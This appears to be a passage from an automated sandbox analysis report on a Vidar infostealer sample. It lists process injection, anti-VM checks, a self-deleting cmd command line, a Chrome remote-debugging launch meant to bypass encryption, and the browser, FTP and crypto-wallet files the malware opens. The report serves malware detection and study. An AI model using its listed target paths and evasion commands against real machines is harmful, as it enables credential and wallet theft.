              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: chrome.exe, 00000005.00000002.2179515803.00006D8C00B44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
              Source: chrome.exe, 00000005.00000002.2176447902.00006D8C0076C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=b08baaaa-679d-4942-8197-469d6c24be2e
              Source: chrome.exe, 00000005.00000002.2182189334.00006D8C01054000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2690119117.00000000032D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1974946992.0000000001008000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: chrome.exe, 00000005.00000002.2169048086.000001B2683B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_4-12247
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_4-12153
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_4-11859
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0040E886
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040D84A lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrcpyA,lstrcatA,4_2_0040D84A

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
              Searches for specific processes (likely to inject)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,4_2_0040F029
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040F0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,4_2_0040F0CA
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2FF1008Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 419000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41F000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 420000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 421000Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\srq9h" & exitJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_0040DE1C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00417842 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,4_2_00417842
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00414CDB EntryPoint,lstrlenW,GetWindowsDirectoryW,GetComputerNameW,GetFullPathNameA,GetUserNameW,GetFileType,GetModuleFileNameA,GetTempPathW,4_2_00414CDB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040DDBF GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,4_2_0040DDBF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Vidar stealer
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 4.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000003.2029593056.0000000003342000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2042974221.0000000003342000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1967281913.0000000009F36000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe PID: 6544, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 3704, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: BitLockerToGo.exe, 00000004.00000002.2689646012.0000000003064000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
              Source: BitLockerToGo.exe, 00000004.00000002.2689646012.0000000003064000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *exodus*.*
              Source: BitLockerToGo.exe, 00000004.00000002.2689646012.0000000003064000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: BitLockerToGo.exe, 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
              Tries to harvest and steal Bitcoin Wallet information
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Source: Yara matchFile source: 00000004.00000002.2690119117.000000000332F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 3704, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Attempt to bypass Chrome Application-Bound Encryption
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Yara detected Vidar stealer
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 4.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000003.2029593056.0000000003342000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2042974221.0000000003342000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1967281913.0000000009F36000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe PID: 6544, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 3704, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		2
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		1
              Extra Window Memory Injection              		1
              Obfuscated Files or Information              		1
              Credentials in Registry              		1
              Account Discovery              		Remote Desktop Protocol4
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)411
              Process Injection              		1
              DLL Side-Loading              		Security Account Manager4
              File and Directory Discovery              		SMB/Windows Admin Shares1
